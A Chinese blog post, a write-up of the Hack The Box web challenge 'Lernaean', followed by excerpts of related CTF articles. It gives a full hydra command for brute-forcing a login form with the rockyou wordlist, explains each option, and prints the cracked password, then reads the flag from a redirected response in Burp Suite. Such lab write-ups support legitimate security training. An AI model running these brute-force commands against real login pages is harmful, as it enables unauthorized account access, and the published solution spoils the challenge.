HTB(hack the box) Lernaean

最新推荐文章于 2021-09-06 22:38:15 发布
最新推荐文章于 2021-09-06 22:38:15 发布
阅读量502 收藏 1
点赞数 1
分类专栏: HTB 文章标签: HTB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44215027/article/details/103038158
版权

HTB(hack the box) Lernaean

接着上一次的。
题目:
在这里插入图片描述
提示:
你的目标不是很擅长电脑。试着猜猜他们的密码,看看他们是否隐藏了什么!

打开网页:
在这里插入图片描述
不就是暴力破解密码么。使用hydra来破解。

hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64  docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 30206

-l:指定用户名
-P:指定密码字典文件
-t:线程数
http-post-form:表明是post请求
“/:password=^PASS^:Invalid password!” 分别是目标网页位置:需要破解的字段:猜测错误的出现的字段(可以自定义)
-s:端口号

结果:

root@kali:~# hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64  docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 30206
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-12 20:35:57
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-post-form://docker.hackthebox.eu:30206/:password=^PASS^:Invalid password!
[STATUS] 308.00 tries/min, 308 tries in 00:01h, 14344091 to do in 776:12h, 64 active
[30206][http-post-form] host: docker.hackthebox.eu   login: admin   password: leonardo

就得到了密码。登录:
在这里插入图片描述
它告诉你,太慢。。。。。
观察url,被重定向了。使用burpsuite来抓包。观察response。
在这里插入图片描述
红色遮挡的就是flag。

Cirno9-dev
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求(二)
杨秀璋的专栏
01-13 1万+
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台获取邀请码、注册过程。本文将分享Web渗透三道入门题目,它们包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。基础性文章,希望对您有所帮助!
HTB(hack the box) Fuzzy
weixin_44215027的博客
11-12 1305
HTB(hack the box) Fuzzy 一年前就已经注册了hack the box,一直没用。如今开始在这个网站上学习。把自己的经过记下来吧。(国内好像很少用,几乎都没有writeup) 首先做一道20points的web题。 问题描述: 我们已经进入了一些基础设施,我们相信这些基础设施与我们的目标的内部网络相连。我们需要你帮助获取管理员密码的网站,他们目前正在开发。 进入网站的界面: ...
hackthebox系列——Lernaean
0pt1mus
03-01 394
转自个人博客:0pt1mus 现在开始在Hack The Box中练习,希望可以对您有所帮助。 这道题目是Challenges->Web下的Lernaean。我们百度搜索Lernaean,得到的第一个百度百科是水蛇许德拉(Lernaean Hydra),因此我们可以考虑是通过Hydra进行爆破。 打开实例化后的网页: 可以发现只显示一个输入框和一个提交按钮,查看源码,发现是通过POST方...
hackthebox】【Challenges】【Lernaean
大方子
02-01 1355
一个来自HTB的web挑战 提示语:你的目标对计算机不是很好。尝试并猜测他们的密码,看看他们是否隐藏任何东西! 打开页面,出现“Please do not try to guess my password!” 那么我们用hydra来爆破下 hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64 docker.hackth...
HTB Hack The Box -- Archetype
Gh0st_1n_The_Shell的博客
09-06 281
要是不知道怎么连接htb的靶机可以查看我的文章 如何连接Hack The Box的靶机?博客园 如何连接Hack The Box的靶机?CSDN 信息收集 先用nmap扫描对方开放了什么服务 攻击 首先比较引人注意的是 445smb服务,1433SQLServer服务 看到445服务就想到永恒之蓝漏洞,然而在这里应该是windows server的版本比较高(2019),所以应该是已经打了永恒之蓝的补丁 我们可以登陆一下smb服务,看看是否需要密码登录,没有经过权限配置可能默认允许所有人无需身份认证来匿名
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBoxHTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
vagrant-htbHackTheBox的Vagrantfile
03-01
流浪汉 Kali流浪者设置(最低) 安装工具 vim 网络工具 python3 解压缩 多路复用器 纳帕 网页壳 ...如果要添加更多,只需编辑Provision / kali.yml文件。...再一次,g,如果您想添加更多,只需将git repo...cd vagrant-htb
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
hackthebox-writeups:HacktheBox'boot2root'计算机的编写
05-12
hackthebox撰写HacktheBox计算机(boot2root)的文章和用西班牙语或英语编写的挑战。有关密码保护的重要说明直到2020年3月的机器写入都受到相应的根标志的保护。 但是自此日期以来,HTB标志是动态的,并且对于每个...
HackTheBox:只是我在做HackTheBox时的个人记录
04-03
哈克盒子按HTB难度等级和顺序排序机器简单 :端口445 Netbios Samba用户名映射脚本命令执行:MS08_067 NetAPI远程执行代码漏洞:通过FTP上传的ASPX反向Shell(IIS) :端口443 VTigerCRM(Elastix)本地文件包含LFI...
HTB Beep[Hack The Box HTB靶场]writeup系列5
重新启程
02-04 3495
本题是retire机器的第五台了 目录 0x00 靶场信息 0x01 信息搜集 0x02 业务探测 80端口主页:elastix freepbx 80端口mail业务:roundcube webmail 10000端口:webmin 0x03 漏洞分析 elastix roundcube webmin 0x03 web攻击 roundcube webmin elas...
ScriptKiddie
T1me
03-07 328
HTB ScriptKiddie 简介 靶机名为脚本小子,os为Linux,难度不高 信息收集 nmap --min-rate 10000 -sV -p- 10.10.10.226 22和5000端口开放,可以看到运行着werkzeug,是一个WSGI工具包,首先查看一下是否存在已知的洞,发现并不适用。直接访问一手。 发现是一个工具库。漏洞就在其中。 漏洞寻找 首先看看nmap,发现时7.8,没什么可以利用的。 Venom看看有没有什么可利用的。 发现存在apk模版注入。 漏洞利用 msf利用起
Hack The Box——ScriptKiddie
热门推荐
江左盟的博客
02-15 1万+
简介 信息收集 使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图: 访问5000端口发现是简单的黑客工具页面,如图: 使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图: 使用Google和exploit-db搜索该版本漏洞.
HTB(hack the box) Cartographer
weixin_44215027的博客
12-12 481
HTB(hack the box) Cartographer 这道是30points的web题。 提示: 一些地下黑客正在开发一种新的命令和控制服务器。你能闯进去看看他们在干什么吗? 进入网页: 是一个登录界面,首先尝试弱口令:admin admin。 没有提示,又回到了这个页面。 然后,没有验证码,想到爆破,但是因为没有登录错误信息,而且要爆破两个位置,这不太现实。 然后,又尝试用万能密码来...
hack the box[HTB] 邀请码
qq_39682037的博客
05-02 2927
搞了半天,就是叫你发送一个POST请求到 /api/invite/generate gohb@gohb:~$ sudo curl -X POST https://www.hackthebox.eu/api/invite/generate
关于模糊控制的理解,这篇文章不错
EE的博客
11-18 1万+
模糊控制仿真与实现入门 在日常生活中我们常常能听到人们说诸如天气太热了或者天气太冷了这样的话.太冷,太热这样的词是人们对温度数值高低的一种看法,如果我们细问,太冷是多少摄氏度?太热又是多少摄氏度?我们不太可能得到一个确切的温度值,这个数值会随不同的人的看法而改变,年轻人可能15摄氏度才觉得冷,而老年人可能18摄氏度就觉得冷了,不仅如此,实际上我们可能根本得不到一个确切的温度数值,而只能得到一个大致...
HTB(hack the box) Emdee five for life
weixin_44215027的博客
11-13 871
HTB(hack the box) Emdee five for life 接着上一次。 这道也是一个20points的web题目。 提示: 你能加密得足够快么? 进入网页: 让你进行MD5加密,然后加密提交: 提示你太慢了。。。。 所以,很明显让你写个爬虫来完成。 思路:得到源码->正则匹配加密字符串->MD5加密->post发送。 我的源码: 最后结果(因为网络延迟问...
hack the box[HTB]web题之Emdee five for life
qq_39682037的博客
04-27 2770
Can you encrypt fast enough? import requests import hashlib import re url="http://docker.hackthebox.eu:30826/" r=requests.session() out=r.get(url) out=re.search("<h3 align='center'>+.*?&lt...
HTB(hack the box) FreeLancer
weixin_44215027的博客
12-21 3391
HTB(hack the box) FreeLancer 这是一道30points的web题。 提示: 你能测试我的网站有多安全吗?证明我错了,拿到flag! 进入网站: 继续往下浏览: 看到了这个,难道是xss?构造后send,提示: 看来不是xss,只能继续寻找。 然后我看到了: 一个长期存在的事实是,当读者在看一个页面的布局时,他们会被可读的内容分散注意力。 会不会在源码中? 查看...
hackthebox
最新发布
09-11
Hack The Box (HTB) 是一个在线的渗透测试和网络安全训练平台。它提供了一系列虚拟机,供用户尝试攻击和入侵。用户可以通过解决一系列的密码学、网络、应用程序等挑战来增强他们的渗透测试技能。HTB 的目标是帮助用户了解真实世界中的网络漏洞和攻击技术,并提供一个安全的环境来进行学习和实践。 请注意,使用 Hack The Box 平台进行未经授权的攻击是违法的。这个平台仅用于合法的学习和研究目的。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值